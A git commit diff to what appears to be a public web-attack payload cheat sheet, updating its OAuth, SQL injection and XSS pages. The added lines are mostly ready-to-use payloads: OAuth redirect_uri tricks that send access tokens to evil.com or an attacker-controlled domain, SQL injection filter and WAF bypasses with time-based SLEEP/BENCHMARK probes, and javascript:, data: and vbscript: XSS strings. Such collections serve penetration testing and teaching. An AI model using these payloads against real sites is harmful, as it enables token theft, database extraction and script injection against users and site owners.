XSS,SQL OAuth Updated

This commit is contained in:
swisskyrepo 2016-12-04 01:03:59 +07:00
parent 7d67aa4e0d
commit 07388503b0
5 changed files with 56 additions and 9 deletions

View File

@ -1,12 +1,20 @@
# OAuth 2 - Common vulnerabilities
## Grabbing OAuth Token via redirect_uri
Redirect to a controlled domain to get the access token
```
https://www.example.com/signin/authorize?[...]&redirect_uri=https://demo.example.com/loginsuccessful
https://www.example.com/signin/authorize?[...]&redirect_uri=https://localhost
https://www.example.com/signin/authorize?[...]&redirect_uri=https://localhost.evil.com
https://www.example.com/oauth20_authorize.srf?[...]&redirect_uri=https://accounts.google.com/BackToAuthSubTarget?next=https://evil.com
```
Redirect to an accepted Open URL in to get the access token
```
https://www.example.com/oauth20_authorize.srf?[...]&redirect_uri=https://accounts.google.com/BackToAuthSubTarget?next=https://evil.com
https://www.example.com/oauth2/authorize?[...]&redirect_uri=https%3A%2F%2Fapps.facebook.com%2Fattacker%2F
```
OAuth implementations should never whitelist entire domains, only a few URLs so that “redirect_uri” cant be pointed to an Open Redirect.
Sometimes you need to change the scope to an invalid one to bypass a filter on redirect_uri:
```
https://www.example.com/admin/oauth/authorize?[...]&scope=a&redirect_uri=https://evil.com
@ -31,3 +39,4 @@ and SHOULD revoke (when possible) all tokens previously issued based on that aut
* http://blog.intothesymmetry.com/2016/11/all-your-paypal-tokens-belong-to-me.html
* http://homakov.blogspot.ch/2014/02/how-i-hacked-github-again.html
* http://intothesymmetry.blogspot.ch/2014/04/oauth-2-how-i-have-hacked-facebook.html
* http://andrisatteka.blogspot.ch/2014/09/how-microsoft-is-giving-your-data-to.html

View File

@ -5,12 +5,9 @@ I <3 pull requests :)
Last modifications :
* XSS paylods improved
* Methodology added
* OAuth vulnerabilities added
* AWS Bucket added
Extract nice bypass from https://websec.wordpress.com/2010/03/19/exploiting-hard-filtered-sql-injections/
* SQL payloads updated
# Tools

View File

@ -40,7 +40,6 @@ AND MAKE_SET(YOLO<(SELECT(length(concat(login,password)))),1)
AND MAKE_SET(YOLO<ascii(substring(concat(login,password),POS,1)),1)
```
##MYSQL Time Based
```
+BENCHMARK(40000000,SHA1(1337))+

View File

@ -112,6 +112,42 @@ admin") or "1"="1"/*
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
```
## WAF Bypass
No Whitespace - bypass using comments
```
?id=1/*comment*/and/**/1=1/**/--
```
No Whitespace - bypass using parenthesis
```
?id=(1)and(1)=(1)--
```
No Comma - bypass using OFFSET and FROM
```
LIMIT 0,1 -> LIMIT 1 OFFSET 0
SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1).
```
Blacklist using keywords - bypass using uppercase/lowercase
```
?id=1 AND 1=1#
?id=1 AnD 1=1#
?id=1 aNd 1=1#
```
Blacklist using keywords case insensitive - bypass using equivalent
```
AND -> &&
OR -> ||
= -> LIKE,REGEXP, not < and not >
WHERE -> HAVING
```
## Thanks to - Other resources
* MySQL:
- [PentestMonkey's mySQL injection cheat sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet)

View File

@ -113,6 +113,9 @@ java%0dscript:alert(1) - CR (\r)
Using the escape character
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
Using the newline and a comment //
javascript://%0Aalert(1)
javascript://anything%0D%0A%0D%0Awindow.alert(1)
```
XSS with data:
@ -121,7 +124,10 @@ data:text/html,<script>alert(0)</script>
data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+
```
XSS with vbscript: only IE
```
vbscript:msgbox("XSS")
```
## XSS in files
XSS in XML
```